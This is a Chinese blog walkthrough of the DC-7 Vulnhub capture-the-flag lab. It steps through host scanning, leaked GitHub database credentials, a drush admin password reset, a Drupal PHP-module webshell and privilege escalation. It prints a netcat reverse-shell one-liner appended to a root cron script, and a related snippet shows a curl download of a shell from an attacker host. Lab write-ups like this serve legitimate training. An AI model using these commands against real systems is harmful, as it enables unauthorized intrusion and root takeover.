DC-7 靶场学习

最新推荐文章于 2024-05-01 09:48:01 发布
最新推荐文章于 2024-05-01 09:48:01 发布
阅读量440 收藏 1
点赞数 2
文章标签: 学习 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/akxnxbshai/article/details/129558414
版权

文章目录

信息搜集

首先获取目标ip。

arp-scan -l
nmap -sP 192.168.28.0/24

得到目标ip为:

192.168.28.139

先访问页面。

image-20230315141746777

翻译一下。


欢迎来到 DC-7

DC-7引入了一些“新”概念,但我会让你弄清楚它们是什么。 :-)

虽然这个挑战并不是那么技术性,但如果您需要诉诸暴力破解或字典攻击,您可能不会成功。

你要做的,是“跳出框框”思考。

“在”盒子外面。 :-)

提示说明本题不需要爆破密码,下边又发现了一个提示。

image-20230315144805669

账号密码获取

直接搜索DC7USER,staffdb/config.php at master · Dc7User/staffdb (github.com)

发现账号和密码。

<?php
	$servername = "localhost";
	$username = "dc7user";
	$password = "MdR3xOgB7#dW";
	$dbname = "Staff";
	$conn = mysqli_connect($servername, $username, $password, $dbname);
?>

但是却没法登录,扫目录也没发现其他登录服务,利用nmap扫描一下端口。

nmap -sV -A 192.168.28.139

image-20230315145503532
发现开放22端口,尝试ssh登录,成功。

ssh dc7user@192.168.28.139

image-20230315145652179
然后在该用户下发现邮件信息。

image-20230315145941842

修改密码

发现sh执行文件,查看。

cat /opt/scripts/backups.sh

image-20230315150024562
发现drush命令,使用该命令修改admin的密码。

drush user-password admin --password="123456"

image-20230315150352528

成功。

反弹shell

登陆后在Extend中发现可以安装模块,尝试安装php模块。

https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

下载后解压上传即可,然后上传webshell。

image-20230315150828908

编辑完成后保存访问,同时本地打开接收。

image-20230315150903122

然后进入交互模式。

python -c 'import pty;pty.spawn("/bin/bash")'

image-20230315151143998

无法找到flag,尝试提权,利用刚刚的可执行文件提权,设定定时任务。

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.28.142 4444 >/tmp/f" >>back*

image-20230315151504581

得到flag

时间有点长,反弹后直接到root中找flag即可。
在这里插入图片描述

f0njl
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
DC-DC PCB layout 指导.docx
06-18
7. DC-DC Ton 和 Toff 时的电流路径都应该很短,减少阻抗和寄生电感。 8. 小信号是单点接地,距离比较远,免受大电流开关噪声的影响。 9. 在设计 DC-DC PCB 布局时,需要确保所有反馈连接短而直接,反馈电阻和补偿...
DC系列漏洞靶场-渗透测试学习复现(DC-4)
W983079520的博客
12-02 1173
DC-4是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了exim4漏洞提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.145为DC-4靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个:22(SSH服务默认端口)和80(http默认端口)。 4 访
Vulnhub靶场实战---DC-7
一期一会的博客
01-18 3190
0x00 环境准备 1.靶场下载官网地址 https://www.vulnhub.com/entry/dc-7,356/ 2.下载完成以后直接导入vm,kali,靶机均使用均使用NAT模式连接, 攻击机:kali 192.168.88.130 靶机:DC-7 192.168.88.133 0x01 信息收集 1.探测88网段主机,使用nmap扫描。 -sn Ping探测扫描主机,不进行端口扫描(测试过对方主机把icmp包都丢弃掉,依然能检测到对方开机状态) -sp 进行Ping扫描 -sA
2024年最新【DC-7靶场渗透】
2401_84240454的博客
05-01 273
提权想到之前那个在/opt/scripts目录下的backups.sh脚本文件所属者是root,所属组是www-data,而当前用户正是www-data,所以www-data用户可以对这个脚本文件进行操作,并且这个脚本文件定时执行可以利用它来反弹shell。此时发现drupal8不支持php代码,但我们发现该页面中有个extend扩展模块,应该是可以导入php模块的, extend下点击install new module,然后根据提示写入php的安装脚本页面。资源较为敏感,未展示全面,需要的最下面获取。
靶机8 DC-7(过程超详细)
honest_gg的博客
09-26 1505
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场
DC-7靶场下载及渗透实战详细过程(DC靶场系列)
金 帛的博客
08-08 2731
dc-7靶场详细渗透过程
Vulnhub系列之DC7靶场详解
weixin_50053818的博客
05-30 1048
文章目录环境信息收集安装插件拿shell提权 环境 vulhub系列之DC7靶场 VMware虚拟机 kali 信息收集 由目标靶机的MAC地址得到目标IP为192.168.137.103,直接nmap扫描。 可以知道目标开放了80和22端口,直接进入网站。 进入网站发现CMS是drupal 8,在漏洞进行搜索,无果。所以只能查看网站。翻译一下首页的内容。 欢迎来到DC-7 DC-7引入了一些“新”概念,但我将让您弄清楚它们是什么。 ???? 尽管此挑战并不是技术性的全部,但如果您需要诉诸于暴力破
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
vuInhub靶场实战系列-DC-7实战
05-30
vuInhub靶场实战系列-DC-7实战
vuInhub靶场实战系列-DC-9实战
最新发布
06-02
vuInhub靶场实战系列-DC-9实战
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
DC-7靶场实战
qq_42754807的博客
03-25 835
DC-7靶场实战
靶场练习第十五天~vulnhub靶场dc-7
qq_57976347的博客
02-14 388
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:https://download.vulnhub.com/dc/DC-7.zip 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -A -p- 192.168.101.120 2.网站的信息收集 (1)靶机开放了80端口,先
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 468
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
Vulnhub靶机渗透学习——DC-7
qq_45612828的博客
10-22 172
白盒源码审计泄露Drush 重置管理员密码Drupal 8 后台-getshell 方式通过由 root 用户定时执行脚本提权。
DC-7靶机进行渗透测试
zll___的博客
03-24 250
DC-7靶机进行渗透测试
Vulhub 靶场 DC-7解析
黑战士的博客
03-07 860
kali的靶攻击机IP地址:192.168.200.14DC-7靶机的IP地址:暂时未知注意:靶机和攻击机应处于一个网卡下通过MAC地址判断靶机DC-7的IP 地址。
DC-7靶场
2301_76690905的博客
12-20 931
下载后解压会有一个DC-7.ova文件,直接在vm虚拟机点击左上角打开-->文件--.选中这个.ova文件就能创建靶场,kali和靶机都调整至NAT模式,然后即可开始渗透。按照官网提示,可以在google里得到帮助,关键字跟网站下@DC7USER一样,能搜索到其github账户,账户下有网站源码文件,里面有config配置文件信息。发现能运行drush命令,drush命令可以更改密码,在/var/www/html目录下运行drush命令,更改admin的密码。
DC-5靶场渗透过程中,怎样挂载木马文件
06-02
DC-5 靶场渗透过程中,如果要挂载木马文件,可以按照以下步骤进行操作: 1. 找到可写入的目录:可以使用 `ls -al` 命令查看目录权限,找到可写入的目录。通常会有一些临时目录或者上传目录是可写入的。 2. 上传木马文件:将自己准备好的木马文件上传到可写入的目录中。可以使用 `curl` 或者 `wget` 命令进行上传,例如: ``` curl -o shell.php http://attacker.com/shell.php ``` 上述命令会将 `shell.php` 文件下载到本地,并保存到当前目录下。 3. 运行木马文件:在浏览器中访问上传的木马文件,例如 `http://dc5/wordpress/wp-content/plugins/akismet/views/akismet.php`。如果一切正常,就可以获得一个远程 shell,并在目标系统中执行任意命令了。 需要注意的是,这种做法是违法的,仅用于学习和研究目的,切勿在未授权的情况下对他人的系统进行攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

f0njl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值